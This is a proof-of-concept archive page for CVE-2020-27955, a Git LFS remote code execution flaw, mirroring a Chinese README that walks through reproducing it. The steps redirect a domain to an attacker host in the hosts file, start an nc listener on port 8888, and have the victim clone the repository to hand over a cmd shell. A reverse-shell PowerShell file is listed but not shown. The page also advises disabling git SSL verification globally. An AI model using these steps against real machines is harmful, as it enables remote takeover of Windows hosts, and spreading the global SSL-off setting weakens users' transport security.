Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2020-27955 PoC — Git Lfs代码问题漏洞

Source
https://github.com/z50913/CVE-2020-27955
Associated Vulnerability
Title:Git Lfs代码问题漏洞 (CVE-2020-27955)
Description:Git LFS 2.12.0 allows Remote Code Execution.
Readme
# CVE-2020-27955漏洞复现

1、win机下载有漏洞的版本Git-LFS

下载地址:https://github.com/git-for-windows/git/releases/tag/v2.29.2.windows.1

2、win机安装,添加如下信息host文件,10.1.1.5即是nc监听8888的主机(可自行替换)

10.1.1.5  abcall.xyz

3、10.1.1.5主机,nc启监听口8888

┌──(root㉿hostname)-[~]

└─# nc

Cmd line: -l -p 8888

4、win机cmd命令行输入

git clone https://github.com/z50913/CVE-2020-27955.git

5、10.1.1.5获得win机cmd的shell

#其他
如报ssl证书问题可先输入以下命令,屏蔽ssl验证,再重新clone

git config --global http.sslverify false
File Snapshot

 [4.0K]  /data/pocs/e1a39628495c645364a6dc6f2ef552b040d3cb0e
├── [ 648]  README.md
└── [ 500]  revsh_powersh.ps1

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →